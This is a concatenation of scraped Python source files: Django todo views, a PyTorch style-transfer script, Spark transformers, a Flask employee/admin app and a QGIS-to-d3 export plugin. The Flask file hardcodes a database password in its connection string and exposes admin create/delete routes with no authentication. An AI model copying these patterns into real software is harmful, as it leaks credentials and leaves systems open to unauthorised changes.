MyForm\n#from django.http import HttpResponse\n# Create your views here.\n\ndef index(request):\n form = MyForm()\n todo_list = Todo.objects.order_by('id')\n context = {\n 'todo_list': todo_list,\n 'form': form\n }\n return render(request, 'todo/index.html', context)\n\ndef complete(request, id):\n done = Todo.objects.get(pk=id)\n done.completed = True\n done.save()\n return redirect('todo:index')\n\n@require_POST\ndef add(request):\n print(request.POST)\n myform = MyForm(request.POST)\n if myform.is_valid():\n new_todo = Todo(text=myform.cleaned_data['text'])\n new_todo.save()\n return redirect('todo:index')\n\ndef deleteComplete(request):\n Todo.objects.filter(completed__exact=True).delete()\n print('delete completed')\n return redirect('todo:index')\n\ndef deleteAll(request):\n Todo.objects.all().delete()\n return redirect('todo:index')\n","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377508841","text":"import copy\n\nimport torch as T\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nfrom PIL import Image\n\nfrom content_loss import ContentLoss\nfrom style_loss import StyleLoss\nfrom gram_matrix import GramMatrix\n\nIMG_SIZE = 256\nIMG_HEIGHT = IMG_SIZE\nIMG_WIDTH = IMG_SIZE\n\nUSE_CUDA = T.cuda.is_available()\ndtype = T.cuda.FloatTensor if USE_CUDA else T.FloatTensor\n\nloader = transforms.Compose([\n transforms.Scale(IMG_SIZE), # scale imported image\n transforms.ToTensor()]) # transform it into a torch tensor\n\ndef image_loader(image_fname):\n image = Image.open(image_fname)\n image = Variable(loader(image))\n # fake batch dimension required to fit network's input dimensions\n image = image.unsqueeze(0)\n return image\n\nstyle_img = image_loader('style.jpg')\ninput_img = image_loader('input.jpg')\n\ncnn = models.vgg19(pretrained=True).features\n\n# move it to the GPU if possible:\nif USE_CUDA:\n cnn = cnn.cuda()\n\ncontent_layers_default = ['conv_4']\nstyle_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\ndef get_style_model_and_losses(cnn, style_img, content_img,\n style_weight=1000, content_weight=1,\n content_layers=content_layers_default,\n style_layers=style_layers_default, use_cuda=USE_CUDA):\n cnn = copy.deepcopy(cnn)\n\n # just in order to have an iterable access to or list of content/syle\n # losses\n content_losses = []\n style_losses = []\n\n model = nn.Sequential() # the new Sequential module network\n gram = GramMatrix() # we need a gram module in order to compute style targets\n\n # move these modules to the GPU if possible:\n if use_cuda:\n model = model.cuda()\n gram = gram.cuda()\n\n i = 1\n for layer in list(cnn):\n if isinstance(layer, nn.Conv2d):\n name = \"conv_\" + str(i)\n model.add_module(name, layer)\n\n if name in content_layers:\n # add content loss:\n target = model(content_img).clone()\n content_loss = ContentLoss(target, content_weight)\n model.add_module(\"content_loss_\" + str(i), content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n # add style loss:\n target_feature = model(style_img).clone()\n target_feature_gram = gram(target_feature)\n style_loss = StyleLoss(target_feature_gram, style_weight)\n model.add_module(\"style_loss_\" + str(i), style_loss)\n style_losses.append(style_loss)\n\n if isinstance(layer, nn.ReLU):\n name = 
\"relu_\" + str(i)\n model.add_module(name, layer)\n\n if name in content_layers:\n # add content loss:\n target = model(content_img).clone()\n content_loss = ContentLoss(target, content_weight)\n model.add_module(\"content_loss_\" + str(i), content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n # add style loss:\n target_feature = model(style_img).clone()\n target_feature_gram = gram(target_feature)\n style_loss = StyleLoss(target_feature_gram, style_weight)\n model.add_module(\"style_loss_\" + str(i), style_loss)\n style_losses.append(style_loss)\n\n i += 1\n\n if isinstance(layer, nn.MaxPool2d):\n name = \"pool_\" + str(i)\n model.add_module(name, layer) # ***\n\n return model, style_losses, content_losses\n\ndef get_input_param_optimizer(input_img):\n # this line to show that input is a parameter that requires a gradient\n input_param = nn.Parameter(input_img.data)\n optimizer = optim.LBFGS([input_param])\n return input_param, optimizer\n\ndef run_style_transfer(cnn, content_img, style_img, input_img, num_steps=10,\n style_weight=1000, content_weight=1):\n \"\"\"Run the style transfer.\"\"\"\n print('Building the style transfer model..')\n model, style_losses, content_losses = get_style_model_and_losses(cnn,\n style_img, content_img, style_weight, content_weight)\n input_param, optimizer = get_input_param_optimizer(input_img)\n\n print('Optimizing..')\n run = [0]\n while run[0] <= num_steps:\n\n def closure():\n # correct the values of updated input image\n input_param.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_param)\n style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.backward()\n for cl in content_losses:\n content_score += cl.backward()\n\n run[0] += 1\n if run[0] % 2 == 0:\n print(\"run {}:\".format(run))\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(\n style_score.data[0], content_score.data[0]))\n print()\n\n return style_score + style_score\n\n optimizer.step(closure)\n\n # a last correction...\n input_param.data.clamp_(0, 1)\n\n return input_param.data\ninit_img = Variable(T.randn(input_img.data.size())).type(dtype)\noutput = run_style_transfer(cnn, input_img, style_img, init_img)\n\n\nimport ipdb;ipdb.set_trace()\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583733898","text":"from pyspark.sql import Row\nfrom py4j.java_gateway import JavaGateway\nfrom py4j.java_gateway import GatewayParameters\n\nclass Transformer(object):\n\n def new_dataframe_row(self, old_row, column_name, column_value):\n row = Row(*(old_row.__fields__ + [column_name]))(*(old_row + (column_value,)))\n\n return row\n\n def transform(self, dataframe):\n raise NotImplementedError\n\nclass OntologyTransformer(Transformer):\n\n def __init__(self, java_gateway_address, java_gateway_port, num_classes, probability_vector_col=\"prediction\",\n correct_activity_col=\"label_index\", context_col=\"context\", output_col=\"refined_index\"):\n self.probability_vector_col = probability_vector_col\n self.correct_activity_col = correct_activity_col\n self.output_column = output_col\n self.context_col = context_col\n self.java_gateway_address = java_gateway_address\n self.java_gateway_port = java_gateway_port\n self.num_classes = num_classes\n\n def transform(self, dataframe):\n return dataframe.rdd.mapPartitions(self.partition_transform).toDF()\n\n def 
partition_transform(self,iterator):\n parameters = GatewayParameters(address=self.java_gateway_address, port=self.java_gateway_port,\n auto_convert=True)\n gateway = JavaGateway(gateway_parameters=parameters)\n entry_point = gateway.entry_point\n new_iterator = []\n for item in iterator:\n new_item = self._transform(item, entry_point)\n new_iterator.append(new_item)\n gateway.close()\n new_iterator = iter(new_iterator)\n return new_iterator\n\n\n def get_index(self, vector):\n max = 0.0\n max_index = 0\n for index in range(0, self.num_classes):\n if vector[index] > max:\n max = vector[index]\n max_index = index\n\n return max_index\n\n def _transform(self, row, entry_point):\n prediction = row[self.probability_vector_col].toArray() #numpy array\n context = row[self.context_col]\n correct_activity = row[self.correct_activity_col]\n correct_activity = int(correct_activity)\n index = 0.0\n if context == \"Null\":\n index = float(self.get_index(prediction))\n else:\n index = entry_point.refinePrediction(prediction.tolist(), correct_activity, context)\n index = float(index)\n new_row = self.new_dataframe_row(row, self.output_column, index)\n\n return new_row\n\n\nclass LabelIndexTransformer(Transformer):\n\n def __init__(self, output_dim, input_col=\"prediction\", output_col=\"prediction_index\",\n default_index=0, activation_threshold=0.55):\n self.input_column = input_col\n self.output_column = output_col\n self.output_dimensionality = output_dim\n self.activation_threshold = activation_threshold\n self.default_index = default_index\n\n def get_index(self, vector):\n max = 0.0\n max_index = self.default_index\n for index in range(0, self.output_dimensionality):\n if vector[index] >= self.activation_threshold:\n return index\n if vector[index] > max:\n max = vector[index]\n max_index = index\n\n return max_index\n\n def _transform(self, row):\n prediction = row[self.input_column]\n index = float(self.get_index(prediction))\n new_row = self.new_dataframe_row(row, self.output_column, index)\n\n return new_row\n\n def transform(self, dataframe):\n return dataframe.rdd.map(self._transform).toDF()\n\n","sub_path":"elephas/transformers.py","file_name":"transformers.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378101544","text":"from app import app\nfrom app.functions import make_salt, make_pw_hash\nfrom flask import Flask, g, render_template, jsonify, url_for, flash\nfrom flask import request, redirect, make_response\nfrom flask import session as login_session\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Extension, Admin, Employee, Logs\nfrom functools import wraps\n\n\n# Connect to Database and create database session\nengine = create_engine('postgresql://telefonia:entr0p1a@localhost/telefoniadb')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n#Employee\n@app.route('/employee', methods=['GET', 'POST'])\ndef employee():\n\tif request.method == 'GET':\n\n\t\temployees = session.query(Employee).all()\n\t\treturn render_template('employee.html', employees=employees)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\treturn render_template('employee.html')\n\n#Applicaction User\n@app.route('/appUser', methods=['GET', 'POST'])\ndef appUser():\n\tif request.method == 'GET':\n\n\t\tadmins = session.query(Admin).all()\n\t\treturn 
render_template('applicationUser.html', admins=admins)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\treturn render_template('applicationUser.html')\n\n\n#View Employee\n@app.route('/employee/view/<int:id>', methods=['GET', 'POST'])\ndef viewEmployee(id):\n\n\temployee = session.query(Employee).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('view-employee.html', employee=employee)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tmail = request.form['textMail']\n\t\t\tpassword = request.form['textPassword']\n\t\t\tif employee.pw_hash == password:\n\t\t\t\tpw_hash = password\n\t\t\telse:\n\t\t\t\tpw_hash = make_pw_hash(mail, password)\n\n\t\t\temployee.userId = request.form['textUserId']\n\t\t\temployee.fullName = request.form['textFullName']\n\t\t\temployee.pw_hash = pw_hash\n\t\t\temployee.isManager = request.form['selectIsManager']\n\t\t\temployee.mail = mail\n\t\t\temployee.firstManagerId = request.form['textFirstManagerId']\n\t\t\temployee.firstManagerFullName = request.form['textFirstManager']\n\t\t\temployee.firstManagerMail = request.form['textFirstMailManager']\n\t\t\temployee.country = request.form['selectCountry']\n\t\t\temployee.site = request.form['selectSite']\n\t\t\tsession.add(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n#Delete Employee\n@app.route('/employee/delete/<int:id>', methods=['GET', 'POST'])\ndef deleteEmployee(id):\n\n\temployee = session.query(Employee).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('delete-employee.html', employee=employee)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tsession.delete(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n\n#New Employee\n@app.route('/newEmployee', methods=['GET', 'POST'])\ndef newEmployee():\n\tif request.method == 'GET':\n\t\treturn render_template('new-employee.html')\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tmail = request.form['textMail']\n\t\t\tpassword = request.form['textPassword']\n\n\t\t\tpw_hash = make_pw_hash(mail, password)\n\n\t\t\temployee = Employee(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tfullName = request.form['textFullName'],\n\t\t\t\tpw_hash = pw_hash,\n\t\t\t\tisManager = request.form['selectIsManager'],\n\t\t\t\tmail = mail,\n\t\t\t\tfirstManagerId = request.form['textManagerId'],\n\t\t\t\tfirstManagerFullName = request.form['textManager'],\n\t\t\t\tfirstManagerMail = request.form['textMailManager'],\n\t\t\t\tcountry = request.form['selectCountry'],\n\t\t\t\tsite = request.form['selectSite'])\n\n\t\t\tprint(\"inside POST newEmployee\")\n\t\t\tsession.add(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n\n\n#Add Application User\n@app.route('/addAppUser', methods=['GET', 'POST'])\ndef addAppUser():\n\n\tif request.method == 'GET':\n\t\treturn render_template('add-appUser.html')\n\n\tif request.method == 'POST':\n\t\temployee = session.query(Employee).filter_by(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tcountry = request.form['selectCountry']).one()\n\n\t\tprint(\"after the employee query\")\n\t\tif employee:\n\t\t\tadmin = Admin(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tfullName = employee.fullName,\n\t\t\t\tmail = employee.mail,\n\t\t\t\trol = request.form['selectRol'],\n\t\t\t\tcountry = request.form['selectCountry'],\n\t\t\t\tsite = employee.site,\n\t\t\t\tjustification = request.form['textJustificacion'])\n\n\t\t\tprint(\"after creating the 
objeto\")\n\t\t\tsession.add(admin)\n\t\t\tsession.commit()\n\t\t\treturn redirect(url_for('appUser'))\n\t\telse:\n\t\t\treturn render_template('add-appUser.html')\n\t\t\n#View App User\n@app.route('/appUser/view/', methods=['GET', 'POST'])\ndef viewAppUser(id):\n\n\tadmin = session.query(Admin).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('view-appUser.html', admin=admin)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tadmin.userId = request.form['textUserId']\n\t\t\tadmin.rol = request.form['textRol']\n\t\t\tadmin.fullName = request.form['textFullName']\n\t\t\tadmin.mail = request.form['textMail']\n\t\t\tadmin.country = request.form['selectCountry']\n\t\t\tadmin.site = request.form['selectSite']\n\t\t\tadmin.justification = request.form['textJustificacion']\n\t\t\tsession.add(admin)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('appUser'))\n\n\n#Delete App User\n@app.route('/appUser/delete/', methods=['GET', 'POST'])\ndef deleteAppUser(id):\n\n\tadmin = session.query(Admin).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('delete-appUser.html', admin=admin)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tsession.delete(admin)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('appUser'))","sub_path":"app/configurations.py","file_name":"configurations.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148802697","text":"from django.conf.urls import url\n\nfrom note.views import index, regex, git, linux\n\napp_name = 'note'\n\nurlpatterns = [\n url(r'^regex/$', regex, name='regex'),\n url(r'^git/$', git, name='git'),\n url(r'^linux/$', linux, name='linux'),\n url(r'^$', index, name='index'),\n]\n","sub_path":"note/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113384706","text":"import os\nimport sys\nimport inspect\nimport traceback\nimport re\nimport string\nimport shutil\nimport time\nimport codecs\nimport webbrowser\nimport zipfile\n\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\nfrom logger import log\nfrom osHelp import osHelper\nfrom symbology import *\nfrom projections import *\nfrom bbox import *\nfrom outputHelp import *\nfrom viz import *\nfrom gisWrapper import *\nfrom labelHelper import labeling\n\nclass model:\n \"\"\"Model for the UI\"\"\"\n \n def __init__(self, iface):\n \"\"\"Initialise the model\"\"\"\n self.__logger = log(self.__class__.__name__)\n self.__colorField = \"d3Css\"\n self.__sizeField = \"d3S\"\n self.__cssFile = \"color.css\"\n self.__selectedFields = [] \n self.__tempVizFields = [] \n self.__ranges = dataRanges() \n self.__qgis = qgisWrapper() \n \n self.__logger.info(QGis.QGIS_VERSION)\n self.__logger.info(sys.version)\n \n self.iface = iface\n self.title = u\"\"\n self.showHeader = False\n self.width = 800\n self.height = 600\n self.idField = \"\"\n self.formats = []\n self.selectedFormat = None\n self.simplification = \"\"\n self.outputFolder = u\"\"\n self.vectors = [] \n self.projections = [] \n self.selectedProjection = None \n self.legend = False\n self.legendPositions = [\"Top Left\", \"Top Right\", \"Bottom Right\", \"Bottom Left\", \"External\"]\n self.selectedLegendPosition = 0\n self.popup = False\n self.popupPositions = [\"Bubble\", \"External\"]\n self.selectedPopupPosition = 0\n 
self.panZoom = False\n self.extraVectors = False\n self.showLabels = False\n self.osHelp = osHelper()\n self.hasViz = False \n self.charts = [] \n self.vizLabels = [] \n self.selectedVizChart = None \n self.vizWidth = 240\n self.vizHeight = 240 \n self.steradians = [\"\", \n \"1e-12\", \"2e-12\", \"3e-12\", \"4e-12\", \"5e-12\", \"6e-12\", \"7e-12\", \"8e-12\", \"9e-12\", \n \"1e-11\", \"2e-11\", \"3e-11\", \"4e-11\", \"5e-11\", \"6e-11\", \"7e-11\", \"8e-11\", \"9e-11\", \n \"1e-10\", \"2e-10\", \"3e-10\", \"4e-10\", \"5e-10\", \"6e-10\", \"7e-10\", \"8e-10\", \"9e-10\", \n \"1e-9\", \"2e-9\", \"3e-9\", \"4e-9\", \"5e-9\", \"6e-9\", \"7e-9\", \"8e-9\", \"9e-9\", \n \"1e-8\", \"2e-8\", \"3e-8\", \"4e-8\", \"5e-8\", \"6e-8\", \"7e-8\", \"8e-8\", \"9e-8\", \n \"1e-7\", \"2e-7\", \"3e-7\", \"4e-7\", \"5e-7\", \"6e-7\", \"7e-7\", \"8e-7\", \"9e-7\", \n \"1e-6\", \"2e-6\", \"3e-6\", \"4e-6\", \"5e-6\", \"6e-6\", \"7e-6\", \"8e-6\", \"9e-6\", \n \"1e-5\", \"2e-5\", \"3e-5\", \"4e-5\", \"5e-5\", \"6e-5\", \"7e-5\", \"8e-5\", \"9e-5\", \n \"1e-4\", \"2e-4\", \"3e-4\", \"4e-4\", \"5e-4\", \"6e-4\", \"7e-4\", \"8e-4\", \"9e-4\", \n \"1e-3\", \"2e-3\", \"3e-3\", \"4e-3\", \"5e-3\", \"6e-3\", \"7e-3\", \"8e-3\", \"9e-3\" ]\n \n # list of output formats\n frmts = [cls() for cls in outFormat.__subclasses__()]\n for f in frmts:\n self.formats.append(f)\n \n if len(self.formats) > 0:\n self.selectedFormat = self.formats[0]\n \n # list of tested projections \n projs = [cls() for cls in projection.__subclasses__()]\n for p in projs:\n self.projections.append(p)\n \n if len(self.projections) > 0:\n self.selectedProjection = self.projections[0]\n \n # list of charts for data viz \n cs = [cls() for cls in chart.__subclasses__()] \n for c in cs:\n self.charts.append(c)\n \n if len(self.charts) > 0:\n self.selectedChart = self.charts[0]\n \n \n def hasTopoJson(self): \n \"\"\"Does the system have node.js and topojson installed?\"\"\" \n \n found = False\n \n try: \n found = self.osHelp.helper.hasTopojson()\n \n except Exception as e:\n # What? 
log and continue\n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n\n return found\n \n \n def setup(self): \n \"\"\"Get the vector layers from QGIS and perform other startup actions\"\"\"\n # Reset\n del self.vectors[:]\n \n layers = iface.legendInterface().layers()\n found = False\n for layer in layers:\n if layer.type() == QgsMapLayer.VectorLayer and layer.rendererV2() is not None:\n found = True\n self.vectors.append(vector(self.iface, layer))\n \n # At __init__ the first in the list will be the main vector layer\n if found == True:\n self.vectors[0].main = True\n \n def setSelectedPopupField(self, name, state):\n \"\"\"Set the selected field state\"\"\"\n if state == True:\n if name not in self.__selectedFields:\n self.__selectedFields.append(name)\n else:\n if name in self.__selectedFields:\n self.__selectedFields.remove(name)\n \n def setSelectedVizField(self, name, state):\n \"\"\"Set the selected viz field state\"\"\"\n if state == True:\n if name not in self.__tempVizFields:\n self.__tempVizFields.append(name)\n else:\n if name in self.__tempVizFields:\n self.__tempVizFields.remove(name)\n \n def resetSelectedVizFields(self):\n \"\"\"Reset the currently selected viz fields\"\"\"\n self.__tempVizFields[:] = []\n \n def getCurrentRangeLength(self):\n \"\"\"Check the length of the current data range\"\"\"\n return len(self.__tempVizFields)\n \n def addCurrentRange(self, name):\n \"\"\"Add the temporary data range to the list\"\"\"\n if len(self.__tempVizFields) > 0:\n data = dataRange(name)\n \n for f in self.__tempVizFields:\n data.appendField(f)\n \n self.__ranges.append(data)\n self.resetSelectedVizFields()\n \n \n def getPopupTemplate(self):\n \"\"\"Return the preview of the html popup\"\"\"\n return self.selectedFormat.getPopupTemplate(self.__selectedFields, self.hasViz, self.vizWidth, self.vizHeight)\n \n def getDataRangePreview(self):\n \"\"\"Get the preview of fields in each data range\"\"\"\n temp = \"\"\n \n for data in self.__ranges:\n temp += data.getDisplayString()\n temp += \"\\r\\n\"\n \n return temp\n \n def deleteLastRange(self):\n \"\"\"Remove the last data range from the list\"\"\"\n if len(self.__ranges) > 0:\n self.__ranges.pop()\n \n def resetRanges(self):\n \"\"\"Remove all previously created ranges\"\"\"\n self.__ranges[:] = []\n \n def getRangeCount(self):\n \"\"\"Retrieve the count of data ranges\"\"\"\n return len(self.__ranges)\n \n def getVizLabelMask(self):\n \"\"\"Get the input mask for the data viz labels\"\"\"\n return self.__ranges.getQtLabelMask()\n \n def setSelectedLayer(self, name, state):\n \"\"\"Set the selected extra layer for use in the map\"\"\" \n for v in self.vectors:\n if v.name == name: \n v.extra = state\n \n def getSelectedLayers(self):\n \"\"\"Retrieve the selected vector layers\"\"\"\n found = []\n for v in self.vectors:\n if v.extra == True:\n found.append(v)\n return found\n \n def setMainLayer(self, index):\n \"\"\"Set the main layer for use in the map\"\"\"\n for v in self.vectors:\n v.main = False\n \n self.vectors[index].main = True\n # also clear the list of selected fields\n self.__selectedFields = []\n \n def getMainLayer(self):\n \"\"\"Retrieve the selected main vector layer\"\"\"\n found = None\n for v in self.vectors:\n if v.main == True:\n found = v\n return found\n \n def setSelectedProjection(self, index):\n \"\"\"Set the selected projection for use later\"\"\"\n for p in self.projections:\n p.selected = False\n \n self.projections[index].selected = True\n \n def getSelectedProjection(self):\n 
\"\"\"Retrieve the selected projection\"\"\" \n found = None\n for p in self.projections:\n if p.selected == True:\n found = p\n return found \n \n def getLayersForOutput(self):\n \"\"\"Get all the layers selected for output in the order defined in the QGIS legend\"\"\"\n found = []\n # Get all vecotr layers, extras as well as the main layer\n for v in self.vectors:\n if (self.extraVectors == True and v.extra == True) or v.main == True:\n found.append(v)\n # Reverse the order for processing the output, \n # this will also form the order the SVG groups are created\n found.reverse()\n return found \n \n def getUniqueFolderName(self): \n \"\"\"Get a unique folder name\"\"\"\n return time.strftime(\"%Y%m%d%H%M%S\") \n \n def getSymbology(self, renderer, layer, transparency, index):\n \"\"\"Read the symbology, generate a CSS style and set against each row in the layers attribute table\"\"\"\n \n dump = renderer.dump() \n self.__logger.info(dump)\n \n if dump[0:6] == \"SINGLE\":\n return self.setSingleSymbol(layer, renderer, transparency, index) \n elif dump[0:11] == \"CATEGORIZED\":\n return self.setCategorizedSymbol(layer, renderer, transparency, index) \n elif dump[0:9] == \"GRADUATED\": \n return self.setGraduatedSymbol(layer, renderer, transparency, index)\n else:\n words = dump.split(\" \")\n e = ValueError(\"{0} renderer in {1} not supported\".format(words[0], layer.name))\n raise e \n \n def setSingleSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for single symbol layers\"\"\" \n\n self.__logger.info(\"setSingleSymbol\")\n geoType = layer.geometryType() \n \n syms = layerSymbols()\n cssstub = self.getLayerObjectName(index)\n \n css = cssstub + \"r0\"\n s = singleSymbol(geoType, renderer.symbol(), index, css, transparency) \n syms.append(s) \n\n return syms\n \n def setCategorizedSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for categorized symbol layers\"\"\"\n \n self.__logger.info(\"setCategorizedSymbol\")\n field = renderer.classAttribute()\n geoType = layer.geometryType()\n cssstub = self.getLayerObjectName(index)\n syms = layerSymbols()\n \n fieldType = \"String\"\n fields = layer.pendingFields()\n for f in fields:\n if f.name() == field:\n fieldType = f.typeName() \n break\n \n for i, c in enumerate(renderer.categories()):\n css = cssstub + \"c\" + str(i)\n s = categorized(geoType, field, fieldType, c, index, css, transparency) \n syms.append(s) \n \n return syms\n \n def setGraduatedSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for graduated symbol layers\"\"\"\n \n self.__logger.info(\"setGraduatedSymbol\")\n field = renderer.classAttribute()\n geoType = layer.geometryType()\n cssstub = self.getLayerObjectName(index)\n syms = layerSymbols()\n \n for i, r in enumerate(renderer.ranges()):\n css = cssstub + \"r\" + str(i)\n s = graduated(geoType, field, r, index, css, transparency) \n syms.append(s) \n \n return syms\n \n def writeSymbology(self, layer, syms):\n \"\"\"Write the CSS value to the d3css column\"\"\"\n # Create a single transaction for the whole lot\n layer.startEditing() \n # Loop through each symbol\n if syms is not None:\n for sym in syms:\n filt = sym.getFilterExpression()\n self.__logger.info(\"Filter: \" + filt)\n \n # Get the features with this particular symbology\n features = None\n if len(filt) > 0:\n features = layer.getFeatures(QgsFeatureRequest().setFilterExpression(filt))\n else: \n features = layer.getFeatures()\n \n # Loop though each feature returned from 
the filter\n for feature in features:\n index = layer.fieldNameIndex(self.__colorField) \n layer.changeAttributeValue(feature.id(), index, sym.symbol.css)\n index = layer.fieldNameIndex(self.__sizeField) \n layer.changeAttributeValue(feature.id(), index, sym.symbol.size)\n\n # Commit the transaction\n layer.commitChanges()\n \n def getCanvasStyle(self):\n \"\"\"Get the canvas background color\"\"\"\n style = \"#mapSvg{{background-color: {0};}}\\n\"\n return style.format(self.iface.mapCanvas().canvasColor().name())\n \n def writeCss(self, uid, symbols, labels):\n \"\"\"Create/append CSS file for symbology\"\"\"\n n = self.getDestCssFile(uid)\n f = open(n, \"a\")\n try:\n # write out the background color on the first iteration through the outer loop\n f.write(self.getCanvasStyle())\n \n # write out all the symbols associated with the layer\n if symbols is not None:\n for sym in symbols:\n f.write(sym.symbol.toCss() + \"\\n\")\n \n # write out the label styles\n if labels is not None:\n for label in labels:\n if label.hasLabels() == True:\n f.write(label.getStyle() + \"\\n\")\n \n except Exception as e:\n # don't leave open files \n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def writeDataFile(self, uid):\n \"\"\"Write the main info file which will be used in the popup\"\"\"\n main = self.getMainLayer()\n features = main.layer.getFeatures()\n \n n = self.getDestDataFile(uid)\n f = codecs.open(n, \"a\", \"utf-8\")\n try:\n if self.hasViz == True:\n # Merge the range data with any selected fields\n for range in self.__ranges:\n fields = range.getFields()\n for field in fields:\n if field not in self.__selectedFields:\n self.__selectedFields.append(field)\n \n # Add the csv header\n if self.idField not in self.__selectedFields:\n self.__selectedFields.append(self.idField)\n \n f.write(u\",\".join(self.__selectedFields))\n f.write(\"\\n\") \n \n # Loop through each feature and read the values\n for feature in features:\n line = u\"\"\n for field in self.__selectedFields:\n idField = (field == self.idField)\n line += self.safeCsvString(feature[field], idField) + \",\"\n f.write(unicode(line[:-1]))\n f.write(u\"\\n\")\n \n except Exception as e:\n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def writeLegendFile(self, uid, syms):\n \"\"\"Write the legend for the main layer\n Output limited to Graduated and Categorized renderers\"\"\"\n \n '''Note: Only check the actual object, not derived types due to inheritance hierarchy'''\n if syms is not None and len(syms) > 0 and type(syms[0]) != singleSymbol:\n n = self.getDestLegendFile(uid)\n f = codecs.open(n, \"a\", \"utf-8\")\n #for now a fixed width and height for the legend\n template = u\"{w},{h},{c},{t}\\n\"\n try:\n \n f.write(\"Width,Height,Color,Text\\n\")\n for sym in syms:\n if len(sym.label.strip()) > 0:\n uCss = unicode(sym.symbol.css) \n uText = self.safeCsvUnicode(sym.label, False)\n \n f.write(template.format(\n w = sym.symbol.legendWidth,\n h = sym.symbol.legendHeight,\n c = uCss, \n t = uText))\n \n except Exception as e:\n # don't leave open files \n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def safeCsvString(self, obj, idField):\n \"\"\"Make a string safe from commas and NULLS\"\"\"\n val = obj\n if isinstance(obj, unicode) == False:\n val = str(obj)\n \n if val == \"NULL\":\n val = \"\"\n if idField == True:\n # d3 strips empty floating points 
from its id property returning whole numbers\n if val.endswith(\".0\"):\n val = val[:len(val)-2] \n \n return val.replace(\",\",\"\")\n \n def safeCsvUnicode(self, obj, idField):\n \"\"\"Make a string safe for use in a CSV file\n \n returns unicode formatted string\"\"\"\n \n val = obj\n if isinstance(obj, unicode) == False:\n val = unicode(obj, \"utf-8\") \n \n return self.safeCsvString(val, idField)\n \n \n def createFolders(self, uid):\n \"\"\"Create the folder structure and copy code files\"\"\"\n src = self.getSourceFolder()\n dest = self.getDestFolder(uid)\n \n try:\n if os.path.isdir(dest):\n # Never going to happen, but just in case... \n self.__logger.info(\"delete previous folder \" + dest)\n shutil.rmtree(dest) \n\n # Now copy over\n shutil.copytree(src, dest, ignore=self.excludeFiles)\n \n except OSError as e: \n self.__logger.error(e.args[1])\n \n def excludeFiles(self, dir, files):\n \"\"\"Don't copy over the file used to force empty directory creation during \n the plugin distribution as a zip file\"\"\"\n \n return {\".forcecreation\"}\n \n def zipShpFiles(self, uid):\n \n dest = \"source.zip\"\n path = self.getDestShpFolder(uid)\n \n try:\n zipf = zipfile.ZipFile(os.path.join(path, dest), \"w\")\n for root, dirs, files in os.walk(path):\n for file in files:\n if file != dest:\n filePath = os.path.join(root, file)\n zipf.write(filePath, file)\n os.remove(filePath)\n zipf.close()\n except:\n self.__logger.error2()\n pass\n \n def isWindows(self):\n \"\"\"Windows OS?\"\"\"\n return self.osHelp.isWindows \n \n def getSourceFolder(self):\n \"\"\"Get the plugin html source folder\"\"\"\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), \"html\")\n \n def getDestFolder(self, uid):\n \"\"\"Get the destination folder with the unique id appended\"\"\"\n safeFolder = self.outputFolder\n if self.isWindows() == True:\n safeFolder = self.outputFolder.encode('ascii', 'ignore')\n\n return os.path.join(safeFolder, uid)\n \n def getUniqueFilePath(self, fullPath):\n 